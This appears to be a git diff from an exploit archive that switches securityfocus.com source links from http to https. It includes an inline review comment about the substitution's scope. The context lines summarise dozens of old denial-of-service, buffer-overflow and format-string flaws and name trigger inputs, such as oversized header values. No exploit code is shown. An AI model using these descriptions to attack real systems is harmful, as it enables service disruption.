a/exploits/multiple/dos/22859.txt b/exploits/multiple/dos/22859.txt index 535dd291b..0672bb310 100644 --- a/exploits/multiple/dos/22859.txt +++ b/exploits/multiple/dos/22859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8096/info +source: https://www.securityfocus.com/bid/8096/info Axis Print Server web interface could expose the device to a denial of service vulnerability. 
diff --git a/exploits/multiple/dos/22926.txt b/exploits/multiple/dos/22926.txt index d54ca7035..94c0d895b 100644 --- a/exploits/multiple/dos/22926.txt +++ b/exploits/multiple/dos/22926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8224/info +source: https://www.securityfocus.com/bid/8224/info Witango Server is prone to a remote buffer overflow vulnerability. Remote users may be able to send an HTTP request to a Witango server with a cookie containing a specific variable set to an excessively large value. Remote code execution is possible. diff --git a/exploits/multiple/dos/22987.pl b/exploits/multiple/dos/22987.pl index 0b569ea73..3b52dc61d 100755 --- a/exploits/multiple/dos/22987.pl +++ b/exploits/multiple/dos/22987.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8343/info +source: https://www.securityfocus.com/bid/8343/info EveryBuddy is prone to a denial of service vulnerability when handling instant messages of excessive length. This could be exploited with a malicious instant messaging client. diff --git a/exploits/multiple/dos/23050.txt b/exploits/multiple/dos/23050.txt index 5e77134ad..d670f5bcc 100644 --- a/exploits/multiple/dos/23050.txt +++ b/exploits/multiple/dos/23050.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8471/info +source: https://www.securityfocus.com/bid/8471/info It has been reported that a buffer overflow condition exists in the Avant Browser software that may cause an attacker to run arbitrary code on a vulnerable host in order to gain unauthorized access to the system. The vulnerability is due to a lack of boundary condition checks on URL values. diff --git a/exploits/multiple/dos/23051.txt b/exploits/multiple/dos/23051.txt index 5a0057e91..8cfbfbdf6 100644 --- a/exploits/multiple/dos/23051.txt +++ b/exploits/multiple/dos/23051.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8472/info +source: https://www.securityfocus.com/bid/8472/info WapServ has been reported prone to multiple remote denial of service vulnerabilities. diff --git a/exploits/multiple/dos/23142.txt b/exploits/multiple/dos/23142.txt index adc0a228e..0975c7027 100644 --- a/exploits/multiple/dos/23142.txt +++ b/exploits/multiple/dos/23142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8617/info +source: https://www.securityfocus.com/bid/8617/info WideChapter has been reported prone to a buffer overflow vulnerability when handling HTTP requests of excessive length. diff --git a/exploits/multiple/dos/23181.txt b/exploits/multiple/dos/23181.txt index 65a9b3333..18ee3f8cc 100644 --- a/exploits/multiple/dos/23181.txt +++ b/exploits/multiple/dos/23181.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8697/info +source: https://www.securityfocus.com/bid/8697/info Null HTTPd has been reported prone to a remotely triggered denial of service vulnerability. diff --git a/exploits/multiple/dos/23231.txt b/exploits/multiple/dos/23231.txt index fcada934d..a5bf17b02 100644 --- a/exploits/multiple/dos/23231.txt +++ b/exploits/multiple/dos/23231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8787/info +source: https://www.securityfocus.com/bid/8787/info It has been reported that Medieval Total War may be prone to a denial of service vulnerability. The issue is caused when an attacker sends a malformed value for nickname consisting of 0 Unicode characters to the server during the initial authentication process. The exploitation of this issue results in the all users receiving a "Connection expired" message before leading to a crash of the server. diff --git a/exploits/multiple/dos/23263.txt b/exploits/multiple/dos/23263.txt index f41a5a453..71c031b9f 100644 --- a/exploits/multiple/dos/23263.txt +++ b/exploits/multiple/dos/23263.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8853/info +source: https://www.securityfocus.com/bid/8853/info A vulnerability has been discovered in the Opera web browser that could lead to remote code execution. The problem is said to trigger when handling malformed HTML HREF values and may result in a buffer overrun occuring within heap memory. As a result of this issue, an attacker may be capable of executing arbitrary code on a victim user by coaxing them to a malicious web site, or possibly by transmitting a malicious HTML e-mail message to an Opera mail client. diff --git a/exploits/multiple/dos/23276.java b/exploits/multiple/dos/23276.java index 85a19c88e..492fa35d7 100644 --- a/exploits/multiple/dos/23276.java +++ b/exploits/multiple/dos/23276.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8879/info +source: https://www.securityfocus.com/bid/8879/info A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts. diff --git a/exploits/multiple/dos/23292.java b/exploits/multiple/dos/23292.java index d0ca5b068..ae1765875 100644 --- a/exploits/multiple/dos/23292.java +++ b/exploits/multiple/dos/23292.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8892/info +source: https://www.securityfocus.com/bid/8892/info A problem has been reported in the Sun Microsystems Java Virtual Machine that occurs when implementing the Security Manager. Because of this, an attacker may be able to crash the virtual machine. diff --git a/exploits/multiple/dos/23314.c b/exploits/multiple/dos/23314.c index a61c031db..1d8679b25 100644 --- a/exploits/multiple/dos/23314.c +++ b/exploits/multiple/dos/23314.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8936/info +// source: https://www.securityfocus.com/bid/8936/info It has been reported that Serious Sam game engine is vulnerable to a remote denial of service vulnerability due to a failure to handle exceptional conditions. This issue occurs when the client sends a certain malformed parameter to the server. This request may cause the software to consume an excessive amount of CPU cycles leading to a crash or hang. diff --git a/exploits/multiple/dos/23325.c b/exploits/multiple/dos/23325.c index 9e31fc73a..13bfda44f 100644 --- a/exploits/multiple/dos/23325.c +++ b/exploits/multiple/dos/23325.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8947/info +// source: https://www.securityfocus.com/bid/8947/info It has been reported that BRS WebWeaver may be prone to a denial of service issue that may allow a remote attacker to cause the software to crash or hang. The issue presents itself when the server receives a request containing a large string value for the `User-Agent` parameter. diff --git a/exploits/multiple/dos/23390.txt b/exploits/multiple/dos/23390.txt index 5cd17e474..8326d2805 100644 --- a/exploits/multiple/dos/23390.txt +++ b/exploits/multiple/dos/23390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9077/info +source: https://www.securityfocus.com/bid/9077/info A problem has been reported the service used by EffectOffice Server. Because of this, it may be possible for a remote user to deny service to legitimate users of the software. diff --git a/exploits/multiple/dos/23431.pl b/exploits/multiple/dos/23431.pl index e716b5d85..f942d6f5c 100755 --- a/exploits/multiple/dos/23431.pl +++ b/exploits/multiple/dos/23431.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9198/info +source: https://www.securityfocus.com/bid/9198/info It has been reported that sipd may be prone to a vulnerability that may allow a remote attacker to cause a denial of service condition in the software. The problem is reported to exist in the gethostbyname_r function. An attacker may be able to cause the server to crash by sending a malformed SIP request. diff --git a/exploits/multiple/dos/23444.pl b/exploits/multiple/dos/23444.pl index 4960d4cb1..c1de6dbc4 100755 --- a/exploits/multiple/dos/23444.pl +++ b/exploits/multiple/dos/23444.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9236/info +source: https://www.securityfocus.com/bid/9236/info sipd has been reported prone to a format string vulnerability that may be triggered remotely. It has been reported that sip URI arguments passed to the affected server are not sufficiently handled. An attacker may place format specifiers in the URI and they will be handled literally, potentially allowing the attacker to read from and write to arbitrary memory. diff --git a/exploits/multiple/dos/23543.txt b/exploits/multiple/dos/23543.txt index 60b962b0f..b179a6053 100644 --- a/exploits/multiple/dos/23543.txt +++ b/exploits/multiple/dos/23543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9427/info +source: https://www.securityfocus.com/bid/9427/info It has been reported that RapidCache server may be prone to a denial of service vulnerability that may allow an attacker to cause the server to crash or hang. The issue presents itself when an attacker sends an excessively large string value to the server via the 'Host' argument through an HTTP GET request. diff --git a/exploits/multiple/dos/23556.txt b/exploits/multiple/dos/23556.txt index 31174cd35..f5df318c2 100644 --- a/exploits/multiple/dos/23556.txt +++ b/exploits/multiple/dos/23556.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9451/info +source: https://www.securityfocus.com/bid/9451/info The GetWare Web Server component has been reported prone to a remote denial of service vulnerability. It has been reported that the issue will present itself when the affected web server receives malicious HTTP requests that contain negative values for the Content-Length field in the HTTP header. diff --git a/exploits/multiple/dos/23590.txt b/exploits/multiple/dos/23590.txt index 49292406d..ac5d2288e 100644 --- a/exploits/multiple/dos/23590.txt +++ b/exploits/multiple/dos/23590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9482/info +source: https://www.securityfocus.com/bid/9482/info Reptile has been reported prone to a remote denial of service vulnerability. It has been reported that this issue exists because the affected server does not time out on incomplete requests. A remote attacker may exploit this vulnerability to deny service to legitimate users. diff --git a/exploits/multiple/dos/23641.txt b/exploits/multiple/dos/23641.txt index e2a131491..98427bcce 100644 --- a/exploits/multiple/dos/23641.txt +++ b/exploits/multiple/dos/23641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9567/info +source: https://www.securityfocus.com/bid/9567/info Chaser has been reported to be prone to a denial of service vulnerability. This issue is caused by a lack of input validation of a size parameter specified in UDP network communication packets. The process will attempt to read the amount of data specified by the packet, without regard to the amount of memory allocated. This will cause an attempt by the application to dereference unallocated memory, producing an exception and causing the process to crash. diff --git a/exploits/multiple/dos/23642.txt b/exploits/multiple/dos/23642.txt index 597a87ef7..fc2c7897c 100644 --- a/exploits/multiple/dos/23642.txt +++ b/exploits/multiple/dos/23642.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9567/info +source: https://www.securityfocus.com/bid/9567/info Chaser has been reported to be prone to a denial of service vulnerability. This issue is caused by a lack of input validation of a size parameter specified in UDP network communication packets. The process will attempt to read the amount of data specified by the packet, without regard to the amount of memory allocated. This will cause an attempt by the application to dereference unallocated memory, producing an exception and causing the process to crash. diff --git a/exploits/multiple/dos/23656.txt b/exploits/multiple/dos/23656.txt index 8f2f73720..c3956a484 100644 --- a/exploits/multiple/dos/23656.txt +++ b/exploits/multiple/dos/23656.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9587/info +source: https://www.securityfocus.com/bid/9587/info Oracle database has been reported prone to multiple buffer overflow vulnerabilities when processing certain parameters and functions. Specifically the TIME_ZONE parameter, NUMTOYMINTERVAL, NUMTODSINTERVAL and FROM_TZ functions. Excessive data passed to any of the aforementioned parameters/statements may potentially overrun the bounds of a buffer in stack-based memory. This may result in the corruption of memory adjacent to the affected buffer, and ultimately may provide for arbitrary code execution. diff --git a/exploits/multiple/dos/23755.txt b/exploits/multiple/dos/23755.txt index 48605a627..adc78d417 100644 --- a/exploits/multiple/dos/23755.txt +++ b/exploits/multiple/dos/23755.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9738/info +source: https://www.securityfocus.com/bid/9738/info The Ghost Recon Game Engine has been reported prone to a denial of service vulnerability. When handling text strings, the Ghost Recon Game Engine employs a 32-bit integer string size prefix in order to monitor the size of the string. It has been reported that when an invalid size value is supplied an exception will be triggered causing a system wide denial of service. diff --git a/exploits/multiple/dos/23787.txt b/exploits/multiple/dos/23787.txt index ed4cfddd3..fa05f8682 100644 --- a/exploits/multiple/dos/23787.txt +++ b/exploits/multiple/dos/23787.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9794/info +source: https://www.securityfocus.com/bid/9794/info 1st Class Mail Server has been reported prone to a remote buffer overflow vulnerability. The issue exists due to a lack of sufficient boundary checks performed on user-supplied data. diff --git a/exploits/multiple/dos/23799.txt b/exploits/multiple/dos/23799.txt index 148a1985e..d02a94b0c 100644 --- a/exploits/multiple/dos/23799.txt +++ b/exploits/multiple/dos/23799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9840/info +source: https://www.securityfocus.com/bid/9840/info A format string vulnerability has been reported to exists in the Unreal Tournament server engine. This issue is due to a failure of the server application to properly sanitize user supplied network data. diff --git a/exploits/multiple/dos/23805.txt b/exploits/multiple/dos/23805.txt index 98e5577b4..1d0274641 100644 --- a/exploits/multiple/dos/23805.txt +++ b/exploits/multiple/dos/23805.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9849/info +source: https://www.securityfocus.com/bid/9849/info The Battle Mages game server has been reported to be prone to a remote denial of service vulnerability. The issue is reported to present itself when the server receives incomplete client data. Specifically the affected server will attempt to read the expected data size infinitely until it is received, this may allow a remote attacker to tie up server resources and effectively deny service to legitimate users. diff --git a/exploits/multiple/dos/23902.txt b/exploits/multiple/dos/23902.txt index 211b3215a..3a3789f86 100644 --- a/exploits/multiple/dos/23902.txt +++ b/exploits/multiple/dos/23902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10022/info +source: https://www.securityfocus.com/bid/10022/info Roger Wilco Server has been reported prone to a remote denial of service vulnerability. The issue is reported to exist due to a flaw when handling malicious UDP payloads that are destined for the vulnerable server. diff --git a/exploits/multiple/dos/23904.txt b/exploits/multiple/dos/23904.txt index 6b47590b6..5002a938d 100644 --- a/exploits/multiple/dos/23904.txt +++ b/exploits/multiple/dos/23904.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10025/info +source: https://www.securityfocus.com/bid/10025/info A vulnerability has been reported in the Roger Wilco Server, it is reported that a user does not need to connect to the server over the TCP port to have UDP based audio streams handled. Rather the attacker will require knowledge of user ID's connected to a target channel. Because the user ID's for a channel exist in a range of 0-127, the attacker may transmit an audio stream to an affected server that will be heard by all connected users, however the server administrator will have no control over disconnecting or muting this audio stream. 
diff --git a/exploits/multiple/dos/24011.pl b/exploits/multiple/dos/24011.pl index 852734143..5ee9f7cf5 100755 --- a/exploits/multiple/dos/24011.pl +++ b/exploits/multiple/dos/24011.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10159/info +source: https://www.securityfocus.com/bid/10159/info A denial of service vulnerability has been reported in KPhone. This issue may be triggered by a malformed SIP (Session Initiation Protocol) STUN message. This is due to insufficient validation of user-specified STUN packet attribute lengths, causing an out of bounds read and subsequent crash. diff --git a/exploits/multiple/dos/24013.txt b/exploits/multiple/dos/24013.txt index dd5040249..39b578cad 100644 --- a/exploits/multiple/dos/24013.txt +++ b/exploits/multiple/dos/24013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10163/info +source: https://www.securityfocus.com/bid/10163/info A denial of service vulnerability has been reported in Macromedia ColdFusion MX that is reported to occur when the software attempts to write oversized error messages. These error messages will be logged by the server but may also be written into dynamically generated error pages. diff --git a/exploits/multiple/dos/24066.txt b/exploits/multiple/dos/24066.txt index 421188d2d..5d50990d3 100644 --- a/exploits/multiple/dos/24066.txt +++ b/exploits/multiple/dos/24066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10228/info +source: https://www.securityfocus.com/bid/10228/info The DiGi WWW Server has been reported to contain a remote denial of service vulnerability. It has been reported that when the server receives a malformed HTTP GET request, the web server process will consume large amounts of CPU resources. diff --git a/exploits/multiple/dos/24070.txt b/exploits/multiple/dos/24070.txt index ac6769310..ff3b94a43 100644 --- a/exploits/multiple/dos/24070.txt +++ b/exploits/multiple/dos/24070.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10249/info +source: https://www.securityfocus.com/bid/10249/info It has been reported that Sphiro HTTPD is prone to a remote heap based buffer overflow vulnerability. This issue is due to a failure of the application to properly verify buffer boundaries before storing input in fixed buffers. diff --git a/exploits/multiple/dos/24130.txt b/exploits/multiple/dos/24130.txt index 29b2867c7..59c9aed61 100644 --- a/exploits/multiple/dos/24130.txt +++ b/exploits/multiple/dos/24130.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10380/info +source: https://www.securityfocus.com/bid/10380/info ActiveState Perl is reported to be prone to an integer overflow vulnerability. It is revealed through testing that other implementations are also vulnerable. diff --git a/exploits/multiple/dos/24170.txt b/exploits/multiple/dos/24170.txt index 053b22f14..c2d3601d9 100644 --- a/exploits/multiple/dos/24170.txt +++ b/exploits/multiple/dos/24170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10464/info +source: https://www.securityfocus.com/bid/10464/info It is reported that Colin McRae Rally 2004 has a flaw handling server responses when entering the multiplayer menu of the game. diff --git a/exploits/multiple/dos/24242.java b/exploits/multiple/dos/24242.java index e62833b9a..c19c32fd7 100644 --- a/exploits/multiple/dos/24242.java +++ b/exploits/multiple/dos/24242.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10623/info +source: https://www.securityfocus.com/bid/10623/info The Sun Java Runtime Environment Font object is reportedly vulnerable to an assertion failure denial of service vulnerability. This issue is due to a failure of the process to handle exceptional conditions when processing font objects. diff --git a/exploits/multiple/dos/24247.txt b/exploits/multiple/dos/24247.txt index 9f18d0cf2..78de35364 100644 --- a/exploits/multiple/dos/24247.txt 
+++ b/exploits/multiple/dos/24247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10649/info +source: https://www.securityfocus.com/bid/10649/info It is reported that Easy Chat Server is susceptible to multiple denial of service vulnerabilities. diff --git a/exploits/multiple/dos/24282.txt b/exploits/multiple/dos/24282.txt index 44c1da2a5..17581680d 100644 --- a/exploits/multiple/dos/24282.txt +++ b/exploits/multiple/dos/24282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10728/info +source: https://www.securityfocus.com/bid/10728/info It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities. diff --git a/exploits/multiple/dos/24283.txt b/exploits/multiple/dos/24283.txt index 812acdebd..a7c2afd36 100644 --- a/exploits/multiple/dos/24283.txt +++ b/exploits/multiple/dos/24283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10728/info +source: https://www.securityfocus.com/bid/10728/info It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities. diff --git a/exploits/multiple/dos/24305.txt b/exploits/multiple/dos/24305.txt index 690a6fcc2..9098aba14 100644 --- a/exploits/multiple/dos/24305.txt +++ b/exploits/multiple/dos/24305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10782/info +source: https://www.securityfocus.com/bid/10782/info It is reported that VPOP3 is reported prone to a remote denial of service vulnerability. This issue presents itself when an attacker issues a URI request containing a large value for the 'msglistlen' parameter to the web mail interface. diff --git a/exploits/multiple/dos/24351.c b/exploits/multiple/dos/24351.c index f924ae784..cd0dba512 100644 --- a/exploits/multiple/dos/24351.c +++ b/exploits/multiple/dos/24351.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10863/info +// source: https://www.securityfocus.com/bid/10863/info Free Web Chat server is reported prone to multiple denial of service vulnerabilities. The following issues are reported: diff --git a/exploits/multiple/dos/24352.java b/exploits/multiple/dos/24352.java index ee8506924..27e0ac5b8 100644 --- a/exploits/multiple/dos/24352.java +++ b/exploits/multiple/dos/24352.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10863/info +source: https://www.securityfocus.com/bid/10863/info Free Web Chat server is reported prone to multiple denial of service vulnerabilities. The following issues are reported: diff --git a/exploits/multiple/dos/24386.txt b/exploits/multiple/dos/24386.txt index ca9d670ec..342b3c331 100644 --- a/exploits/multiple/dos/24386.txt +++ b/exploits/multiple/dos/24386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10984/info +source: https://www.securityfocus.com/bid/10984/info sarad is reported prone to a buffer overflow vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. diff --git a/exploits/multiple/dos/24388.txt b/exploits/multiple/dos/24388.txt index f3c161139..b8f40cf28 100644 --- a/exploits/multiple/dos/24388.txt +++ b/exploits/multiple/dos/24388.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10989/info +source: https://www.securityfocus.com/bid/10989/info aGSM is reported prone to a remote buffer overflow vulnerability. The issue presents itself in the aGSM server information parsing routines for Half-Life game servers. Due to a lack of sufficient bounds checking performed on the hostname parameter in a server reply to an info request, a malicious server may execute arbitrary code on an affected client. diff --git a/exploits/multiple/dos/24394.txt b/exploits/multiple/dos/24394.txt index c4d5c81a7..641263942 100644 --- a/exploits/multiple/dos/24394.txt +++ b/exploits/multiple/dos/24394.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10997/info +source: https://www.securityfocus.com/bid/10997/info Opera Web Browser is reported prone to a JavaScript denial-of-service vulnerability. diff --git a/exploits/multiple/dos/24423.txt b/exploits/multiple/dos/24423.txt index f92dcd12b..287ac39ec 100644 --- a/exploits/multiple/dos/24423.txt +++ b/exploits/multiple/dos/24423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11085/info +source: https://www.securityfocus.com/bid/11085/info Cerbère Proxy server is reported prone to a remote denial of service vulnerability. This issue presents itself when a remote attacker sends a malformed HTTP GET request to the server. diff --git a/exploits/multiple/dos/24592.txt b/exploits/multiple/dos/24592.txt index 4ab837917..c55901e47 100644 --- a/exploits/multiple/dos/24592.txt +++ b/exploits/multiple/dos/24592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11161/info +source: https://www.securityfocus.com/bid/11161/info Pingtel Xpressa handsets are reported prone to a remote denial of service vulnerability. The issue is reported to exist because of a lack of sufficient boundary checks performed on HTTP request data handled by the Xpressa administration web server. diff --git a/exploits/multiple/dos/24597.txt b/exploits/multiple/dos/24597.txt index 4685db27b..2c5ab4f0a 100644 --- a/exploits/multiple/dos/24597.txt +++ b/exploits/multiple/dos/24597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11169/info +source: https://www.securityfocus.com/bid/11169/info Mozilla is prone to a remotely exploitable heap overflow that is exposed when the browser handles non-ASCII characters in URIs. diff --git a/exploits/multiple/dos/24610.txt b/exploits/multiple/dos/24610.txt index 0b16cc86a..adf291b57 100644 --- a/exploits/multiple/dos/24610.txt +++ b/exploits/multiple/dos/24610.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11213/info +source: https://www.securityfocus.com/bid/11213/info DNS4Me is reported to be susceptible to a denial of service vulnerability, and a cross-site scripting vulnerability. These vulnerabilities affect the built-in web server contained in the package. diff --git a/exploits/multiple/dos/24668.txt b/exploits/multiple/dos/24668.txt index ec86c4027..0effdb3f3 100644 --- a/exploits/multiple/dos/24668.txt +++ b/exploits/multiple/dos/24668.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11351/info +source: https://www.securityfocus.com/bid/11351/info Flash Messaging server is reported prone to a remote denial of service vulnerability. This issue arises due to the inability of the server to handle exceptional conditions properly. A remote attacker may cause a vulnerable server to crash, denying service to legitimate users. diff --git a/exploits/multiple/dos/24691.txt b/exploits/multiple/dos/24691.txt index 0c82dd92a..3670287f8 100644 --- a/exploits/multiple/dos/24691.txt +++ b/exploits/multiple/dos/24691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11462/info +source: https://www.securityfocus.com/bid/11462/info Vypress Tonecast is reported prone to a remote denial of service vulnerability. diff --git a/exploits/multiple/dos/24710.txt b/exploits/multiple/dos/24710.txt index b6cf935b3..48a30795f 100644 --- a/exploits/multiple/dos/24710.txt +++ b/exploits/multiple/dos/24710.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11551/info +source: https://www.securityfocus.com/bid/11551/info Multiple remote vulnerabilities have been reported to affect Quake II. These issues are due to boundary condition checking failures, access validation failures and failures to handle exceptional conditions. diff --git a/exploits/multiple/dos/24715.txt b/exploits/multiple/dos/24715.txt index 5f05d5fd4..c51459daa 100644 --- a/exploits/multiple/dos/24715.txt 
+++ b/exploits/multiple/dos/24715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11567/info +source: https://www.securityfocus.com/bid/11567/info Caudium is reported prone to a remote denial of service vulnerability. diff --git a/exploits/multiple/dos/24761.txt b/exploits/multiple/dos/24761.txt index c5770608e..3f1bceeda 100644 --- a/exploits/multiple/dos/24761.txt +++ b/exploits/multiple/dos/24761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11724/info +source: https://www.securityfocus.com/bid/11724/info The Halo game client is reported prone to a remote denial of service vulnerability. It is reported that when using the in game browser to view a server list, a malicious reply from a server may crash the affected client. diff --git a/exploits/multiple/dos/24763.txt b/exploits/multiple/dos/24763.txt index 86ce37c7b..020990f87 100644 --- a/exploits/multiple/dos/24763.txt +++ b/exploits/multiple/dos/24763.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11726/info +source: https://www.securityfocus.com/bid/11726/info A vulnerability is reported to exist in the access controls of the Java to JavaScript data exchange within web browsers that employ the Sun Java Plug-in. Reports indicate that it is possible for a malicious website that contains JavaScript code to exploit this vulnerability to load a dangerous Java class and to pass this class to an invoked applet. diff --git a/exploits/multiple/dos/24778.html b/exploits/multiple/dos/24778.html index 0629863b8..10d23b8fd 100644 --- a/exploits/multiple/dos/24778.html +++ b/exploits/multiple/dos/24778.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11757/info +source: https://www.securityfocus.com/bid/11757/info Java provides support for dynamic and static versioning when loading applets in the Java plug-in. This means that during the invocation of an applet, a user can request that a particular version of a plug-in be used to run the applet. The feature is accessible through various HTML tags that allow Java applets to be embedded in HTML documents, such as the EMBED, OBJECT, and APPLET tags. @@ -13,11 +13,11 @@ Note that since this feature is supported in various browsers, the browsers them Demonstration uses the following vulnerability:
-http://www.securityfocus.com/bid/8879 +https://www.securityfocus.com/bid/8879
Source code for Simple.class:
-http://www.securityfocus.com/bid/8879/exploit/ +https://www.securityfocus.com/bid/8879/exploit/

Added this code to Simple.java for debugging purposes:
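Review bot: The second hunk of 24778.html rewrites URLs inside the body of the write-up (the `bid/8879` reference and the `bid/8879/exploit/` link), whereas every other hunk visible here touches only the `source:` header on line 1. If the http-to-https substitution was run over whole files, confirm that it matched only securityfocus.com reference links and did not alter URLs that belong to archived proof-of-concept content, and state the scope in the commit message. Restricting the substitution to the first line, with body references such as these two handled as a reviewed exception, would make the change easy to verify.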
diff --git a/exploits/multiple/dos/24781.html b/exploits/multiple/dos/24781.html index dfcac37ce..3d4051081 100644 --- a/exploits/multiple/dos/24781.html +++ b/exploits/multiple/dos/24781.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11761/info +source: https://www.securityfocus.com/bid/11761/info Mozilla Camino Web browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed. diff --git a/exploits/multiple/dos/24793.txt b/exploits/multiple/dos/24793.txt index d707aebd9..6e411f3e1 100644 --- a/exploits/multiple/dos/24793.txt +++ b/exploits/multiple/dos/24793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11780/info +source: https://www.securityfocus.com/bid/11780/info JanaServer 2 is a commercially available proxy server designed for the Microsoft Windows platform. It contains support for services such as HTTP, FTP, email, and RealPlayer streaming. diff --git a/exploits/multiple/dos/24799.txt b/exploits/multiple/dos/24799.txt index 90b1fc7ad..d513b17d3 100644 --- a/exploits/multiple/dos/24799.txt +++ b/exploits/multiple/dos/24799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11823/info +source: https://www.securityfocus.com/bid/11823/info Mozilla/Netscape and Firefox browsers are reported prone a remote denial of service vulnerability. It is reported that the affected browsers will crash as a result of a NULL pointer dereference when a JavaScript function attempts to print an IFRAME that is embedded in the page. diff --git a/exploits/multiple/dos/24805.txt b/exploits/multiple/dos/24805.txt index 953267e19..e84a75d15 100644 --- a/exploits/multiple/dos/24805.txt +++ b/exploits/multiple/dos/24805.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11843/info +source: https://www.securityfocus.com/bid/11843/info A remote denial of service vulnerability has been reported to affect the MySQL MaxDB WAHTTP server. This issue is due to a failure of the server to handle malformed requests. diff --git a/exploits/multiple/dos/24807.txt b/exploits/multiple/dos/24807.txt index 4bc449a24..dac2bc62a 100644 --- a/exploits/multiple/dos/24807.txt +++ b/exploits/multiple/dos/24807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11849/info +source: https://www.securityfocus.com/bid/11849/info The MD5 algorithm is reported prone to a hash collision weakness. This weakness reportedly allows attackers to create multiple, differing input sources that, when the MD5 algorithm is used, result in the same output fingerprint. diff --git a/exploits/multiple/dos/24809.txt b/exploits/multiple/dos/24809.txt index fe3f26751..adfc60143 100644 --- a/exploits/multiple/dos/24809.txt +++ b/exploits/multiple/dos/24809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11859/info +source: https://www.securityfocus.com/bid/11859/info It is reported that the Kerio Personal Firewall (KPF) driver does not sufficiently sanitize API parameters that are received from API's that are hooked by KPF. When the KPF API hook handles certain parameter data it will fail. Reports indicate that this exception is not expected and as a result, the Windows kernel crashes triggering a system wide denial of service. diff --git a/exploits/multiple/dos/24818.txt b/exploits/multiple/dos/24818.txt index 814fc38f9..b4074bb80 100644 --- a/exploits/multiple/dos/24818.txt +++ b/exploits/multiple/dos/24818.txt 
